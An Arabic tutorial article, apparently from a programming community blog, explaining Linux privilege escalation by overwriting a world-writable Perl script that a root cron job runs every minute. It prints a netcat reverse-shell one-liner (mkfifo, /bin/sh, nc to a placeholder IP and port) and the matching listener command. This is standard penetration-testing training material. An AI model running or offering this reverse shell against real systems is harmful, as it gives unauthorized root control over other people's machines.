السلام عليكم ورحمة الله وبركاته
الحمد لله على جميع نِعمه علينا ما علمنا منها وما لم نعلم حمداً والصلاة والسلام على نبينا محمد اشرف الخلق والمرسلين, اما بعد:
مقدمة:
في هذي المقالة راح اشرح لكم تكنيك من تكنيكات رفع الصلاحية على نظام اللينكس وفي هذا التكنيك راح نعتمد على Cron Jobs ف إذا ماعندك خلفية عنها او كيفية طريقة عملها تقدرتتابع هذي المقالة
الشرح:
ف البداية انا داخل بيوز محدود الصلاحية على النظام واسم اليوز test طبعا الهدف اللي ودنا نوصله انه نقدر ننفذ اوامر بيوزر root اللي هو اعلى صلاحية على النظام بالنسبة للينكس
طبعا بما انه التكنيك هذا يعتمد على Cron Jobs راح نقرا الملف الخاص بالجدولة حقته عن طريق هذا الامر
cat /etc/crontab
نلاحظ عندنا في احد التاسكات او المهام اللي تتنفذ كل دقيقة انه يقوم بتشغيل ملف بلغة perl كل دقيقة بصلاحية root جميل ..
خلونا نروح لمسار الملف عشان نشوف هل عندنا صلاحية للتعديل على الملف او لا:
tmp/
نلاحظ انه عندنا صلاحية الكتابة و القراءة على الملف ف لو ننفذ امر على النظام عن طريق دالة system هذا الامر راح يرجع لنا اتصال عكسي وترجع لنا جلسة بصلاحية root
راح نكتب هذا الكود داخل الملف :
system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc IP PORT >/tmp/f")
طبعا انت راح تعدل في الامر قبل لا تكتبه في الملف
راح تحط محل كلمة IP الايبي الخاص بجهازك اللي راح تنفتح عليه الجلسة وكذلك راح تغير كلمة PORT وتحط اي بورت من عندك
وقبل لا تسوي حفظ للملف راح تسوي تنصت عن طريق اداة النت كات على البورت اللي وضعته في الامر
وهذ الامر الخاص بالتنصت :
nc -lvp PORT
راح ننتظر بضع دقائق حتى توصلنا الجلسة :)
وبكذا حصلنا على اعلى صلاحية في النظام root
المصادر:
https://www.hackingarticles.in/linux-privilege-escalation-by-exploiting-cron-jobs/
التعليقات (0)
لايوجد لديك حساب في عالم البرمجة؟
تحب تنضم لعالم البرمجة؟ وتنشئ عالمك الخاص، تنشر المقالات، الدورات، تشارك المبرمجين وتساعد الآخرين، اشترك الآن بخطوات يسيرة !